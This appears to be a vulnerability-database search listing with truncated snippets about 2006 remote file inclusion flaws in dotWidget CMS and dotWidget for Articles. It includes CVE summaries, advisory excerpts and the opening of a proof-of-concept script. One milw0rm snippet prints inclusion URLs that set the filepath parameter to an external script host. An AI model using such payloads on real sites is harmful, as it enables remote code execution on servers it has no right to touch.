35 matches found
EUVD-2006-7034
Malware in sbrugna...
EUVD-2006-2849
Malware in sbrugna...
dotWidget for articles 2.0 admin/index.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget for articles 2.0 showarticle.php file_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget for articles 2.0 admin/editconfig.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class dotWidgetCMSRemoteFileIncludePOCBase: vulID = '63616' version = '1' vulDate = '2006-06-05' author = ' '...
dotWidget for articles 2.0 showcatpicks.php file_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
dotWidget for articles 2.0 admin/authors.php Multiple Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/18479/info dotWidget for Articles is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issu...
CVE-2006-7052
Multiple PHP remote file inclusion vulnerabilities in DotWidget For Articles dotwidgeta 0.2 allow remote attackers to execute arbitrary code via a URL in the 1 filepath parameter to a index.php, b showcatpicks.php, and c showarticle.php; and the 2 adminheaderfile and 3 adminfooterfile parameters ...
CVE-2006-7052
Multiple PHP remote file inclusion vulnerabilities in DotWidget For Articles dotwidgeta 0.2 allow remote attackers to execute arbitrary code via a URL in the 1 filepath parameter to a index.php, b showcatpicks.php, and c showarticle.php; and the 2 adminheaderfile and 3 adminfooterfile parameters ...
CVE-2006-7052
The CVE-2006-7052 entry affects DotWidget For Articles (dotwidgeta) version 0.2, where multiple PHP remote file inclusion vulnerabilities exist. An attacker can trigger arbitrary code execution by supplying a URL path in the file_path parameter for index.php, showcatpicks.php, and showarticle.php...
CVE-2006-2852
PHP remote file inclusion vulnerability in dotWidget CMS 1.0.6 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the filepath parameter in 1 index.php, 2 feedback.php, and 3 printfriendly.php...
Remote file inclusion
PHP remote file inclusion vulnerability in dotWidget CMS 1.0.6 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the filepath parameter in 1 index.php, 2 feedback.php, and 3 printfriendly.php...
CVE-2006-2852
PHP remote file inclusion vulnerability in dotWidget CMS 1.0.6 and earlier, when registerglobals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the filepath parameter in 1 index.php, 2 feedback.php, and 3 printfriendly.php...
CVE-2006-2852
CVE-2006-2852 is a PHP remote file inclusion vulnerability affecting dotWidget CMS
dotWidget CMS 1.0.6 - 'file_path' Remote File Inclusion
Title: dotWidget CMS submitted these extra filepath issues. /includes/common.inc?filepath=http://www.yourspace.com/yourscript.php? /includes/nav.inc?filepath=http://www.yourspace.com/yourscript.php? /admin/dotwidgetcconfig.php?filepath=http://www.yourspace.com/yourscript.php? milw0rm.com 2006-06-...
[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability
MajorSecurity 7dotWidget CMS = 1.0.6 - Remote File Include Vulnerability ------------------------------------------------------------------------------------- Software: dotWidget CMS Version: =1.0.6 Type: Remote File Include Vulnerability Date: June, 2nd 2006 Vendor: dotWidget Page:...
dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities
No description provided by source. Title: dotWidget CMS = 1.0.6 - Remote File Include Vulnerability ----------------------------------------------------------------- Vendor: dotWidget URL: http://dotwigdet.com ----------------------------------------------------------------- Credits: Discovered b...